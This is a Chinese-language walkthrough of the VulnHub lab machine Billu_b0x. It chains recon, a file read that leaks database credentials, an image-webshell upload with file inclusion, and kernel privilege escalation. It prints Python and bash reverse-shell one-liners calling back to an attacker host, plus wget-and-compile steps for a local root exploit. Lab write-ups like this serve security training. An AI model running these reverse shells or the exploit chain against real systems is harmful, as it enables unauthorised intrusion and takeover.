【靶机】vulnhub靶机billu

 靶机下载地址:https://download.vulnhub.com/billu/Billu_b0x.zip

一、环境搭建

1.1 实验环境设计

使用vmware导入靶机,模式为nat模式即可,同时开启kali作为攻击机,对靶机进行渗透,要确定两台主机在同一网段。

Kali的ip是192.168.1.130,靶机的ip是192.168.1.131。

1.2 渗透思路

1.信息搜集:ip发现,端口扫描,子域名爆破,目录扫描。

2.漏洞发现:敏感文件泄露,本地文件包含,文件上传和反弹shell

3.提权:内核提权,suid提权等。

二、信息搜集

首先使用sudo arp-scan -l进行ip扫描,可以看到扫描到的靶机ip为192.168.1.131。

【靶机】vulnhub靶机billu_第1张图片

再使用nmap对靶机进行端口扫描,命令:nmap -p- -sV -A 192.168.1.131,使用的是全端口扫描,检测目标服务的版本,系统探测、版本探测、脚本扫描。

【靶机】vulnhub靶机billu_第2张图片

接着使用gobuster进行目录扫描,命令如下:gobuster dir -u http://192.168.1.131/ \ 

-w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \

-x php,txt,html,js,php.bak,zip

【靶机】vulnhub靶机billu_第3张图片

再次开启一个目录扫描工具,使用dirsearch进行目录扫描:python dirsearch.py -u http://192.168.1.131,可以发现这次扫描到的目录多了几个。

【靶机】vulnhub靶机billu_第4张图片

三、漏洞挖掘与利用

每个子目录进行查看,看到in目录的phpinfo文件,开启了可能有的地方会存在文件包含漏洞。

【靶机】vulnhub靶机billu_第5张图片

查看test.php页面,发现缺少参数file,使用get传参不成功,尝试post传参,可以读取到/etc/passwd文件

【靶机】vulnhub靶机billu_第6张图片

展示一下读取到的/etc/passwd文件

【靶机】vulnhub靶机billu_第7张图片

再次查询,发现在c.php的数据库连接文件中,可以看到数据库的连接密码。账号:billu密码:b0x_billu

【靶机】vulnhub靶机billu_第8张图片

可以发现下图代码panel存在文件包含漏洞。源码解释:接收一个以post传参的load参数,如果没有匹配到add和show选项,则匹配传到的那个参数,因为没有做好过滤,所以访问的路径和文件是我们可以控制的。

【靶机】vulnhub靶机billu_第9张图片

使用找到的数据库账号密码成功登录phpmy目录,可以看到里面auth库下的账号密码。

【靶机】vulnhub靶机billu_第10张图片

 

使用数据库中的账号密码进行index.php页面的登录,成功登录,这里有两个功能,分别是show users 和add users

【靶机】vulnhub靶机billu_第11张图片

看到uploaded_images下只有靶机自带的一些图片,这里考虑使用图片木马配合文件包含漏洞进行getshell

【靶机】vulnhub靶机billu_第12张图片

尝试上传php木马文件,但是被过滤。

【靶机】vulnhub靶机billu_第13张图片

修改mime头和文件头都无法过滤,考虑使用文件包含漏洞进行利用

【靶机】vulnhub靶机billu_第14张图片

先写个图片木马,进行上传。

【靶机】vulnhub靶机billu_第15张图片

这里配合文件包含漏洞进行,那为什么不用test页面的文件包含,是因为test页面只是一个readfile的功能,是属于任意文件读取

可以看到成功命令执行

【靶机】vulnhub靶机billu_第16张图片

四、获得权限

4.1 获得权限

在使用命令进行反弹shell前,需要把payload进行url编码,防止特殊字符会被转义。

可以使用python进行反弹shell:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.130",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

【靶机】vulnhub靶机billu_第17张图片

也可以使用bash进行反弹shell ,命令:echo “bash -i >& /dev/tcp/192.168.1.130/4444  0>&1” | bash

【靶机】vulnhub靶机billu_第18张图片

4.2 权限提升

查看具有suid权限的文件,尝试suid提权,但是失败,命令:find / -user root -perm /4000 2>/dev/null

【靶机】vulnhub靶机billu_第19张图片

尝试内核提权,使用uname -a 和cat /etc/issue查看系统内核版本,使用searchsploit查找对应的内核版本漏洞,可以看到对应的提权版本有37292.c文件。

【靶机】vulnhub靶机billu_第20张图片

使用locate命令查看文件的存放位置,使用cp命令将文件复制到桌面

【靶机】vulnhub靶机billu_第21张图片

提权漏洞的使用方法如下

【靶机】vulnhub靶机billu_第22张图片

在kali的桌面开启终端,使用命令python -m http.server开启web服务,在靶机终端切换到tmp目录中,再使用wget下载该文件。

【靶机】vulnhub靶机billu_第23张图片

使用gcc进行编译,再运行即可提权。

【靶机】vulnhub靶机billu_第24张图片

也可以在phpmy文件找到的配置文件,直接尝试ssh登录即可,登入就是root权限

【靶机】vulnhub靶机billu_第25张图片

总结:

在拿到一个渗透站点,首先我们要判断他的真实ip,然后再使用nmap进行开放端口的扫描和服务的版本等,如果扫描到一些老版本的服务,可以进行nday漏洞的利用,如果开放的一些敏感端口,像21端口的ftp,MySQL的3306端口,windows的远程桌面等,可以在进行信息搜集后进行弱口令的爆破。但最重要的是像80端口和8080端口web服务的漏洞发现.

对于web服务,我们首先要进行信息搜集,使用gobuster和dirsearch进行目录扫描,使用fuzz和wfuzz进行子域名的扫描,如果网站的内容中存在一些特殊的地址,像[email protected]等我们应该修改一下自己本地的host文件,看一下会不会有新的发现。信息搜集完之后进行进行漏洞的发现,这个就有很多种像文件包含、任意文件读取、命令执行、文件上传和逻辑漏洞等,如果目标站点使用了cms等,可以查找对应的nday漏洞。在这台靶机中,利用任意文件读取漏洞读取文件的源码,在源码中发现密码泄露和文件包含漏洞,使用密码登录后再配合图片马完成getshell,再通过内核提权可以拿到root权限。也可以使用目录扫描,暴力破解phpmy目录下的文件,在配置文件中得到的密码可以用来进行ssh登录,直接就是root权限。

总的来说,在拿到渗透的网站后,最重要的就是进行信息搜集,多搜集到一些信息就多一种找到漏洞的可能,在找到网站存在nday漏洞并找到对应版本的exp后,我们要学会对脚本进行适当的修改,有可能拿来就用是失败的,但是修改完路径和一些参数后就可以成功了,在提权的时候要对suid权限的文件敏感,查看在不需要管理员密码的情况下可以执行哪些命令,对定时文件和敏感目录等进行查看,要抓住细节,平时多积累,在做渗透时才能对关键信息敏感,更容易找到漏洞所在。

你可能感兴趣的:(渗透测试,vulnhub,php,安全,web安全)